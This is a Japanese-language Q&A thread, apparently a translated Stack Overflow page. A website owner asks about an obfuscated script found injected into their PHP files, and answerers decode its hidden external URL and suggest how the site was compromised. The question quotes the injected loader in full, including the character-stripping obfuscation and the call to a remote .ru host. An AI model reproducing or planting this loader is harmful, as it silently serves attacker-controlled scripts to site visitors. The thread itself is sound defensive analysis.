1

私のウェブサイトのPHPファイルで次のコードを見つけました。誰かが私のftpをハックできるか、何らかの方法でこのスクリプトを私のPHPファイルに追加できると思いますが、方法がわかりません。

<script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#!n@))$t)#e@&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^i$@#n(e$c!@o@!$)l!)#o&$(r$@)s)@&$.&^r(u()&:!)8(0@@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^(t@@.@!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)!c@(#t#$.(d^e(!#/&!^e)a!^()r&)t^@h@l@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&r@&$l&^d#o!&&#f@()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@o@@m#&^/!@g&#o(^o^&(!&g@l#e^!&&.(c^o#$@m#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->

しかし、上記のコードの意味を知りたいのですが、HTML形式またはその他の形式で暗号化されていると思いますが、上記のコードは実際に何をしていて、誰かが私のWebサイトにどのように挿入できるのでしょうか?

ありがとう。

4

2 に答える 2

2

上記のスクリプトsrcは、アドレスになりますhttp://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/

Webサイト/スクリプトのセキュリティホールを介して、またはftpを介して直接ファイルに侵入しました。

この悪意のあるコードからできるだけ早くファイルをクリーンアップし、ftpパスワードを変更して、セキュリティ上の欠陥を修正してください。

于 2010-02-06T21:29:19.303 に答える
0

私はそれが何もしないと思います。Alexが投稿したのと同じURLなので、ここでは繰り返しません。

curlIE6のユーザーエージェントヘッダーを使用してヘッダーをファイルに記録して取得しようとすると、次のヘッダーが表示されます。

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Feb 2010 21:37:13 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 2

さらに、ファイルの内容は単なるCRLFのようでした。特別なことは何もありません。

なぜそこに置いたのかはわかりませんが、以前は悪意のあるものがあったのかもしれませんが、今はありません...または、悪意のあるコードをそこに置くのを待っているだけです。

于 2010-02-06T21:37:38.413 に答える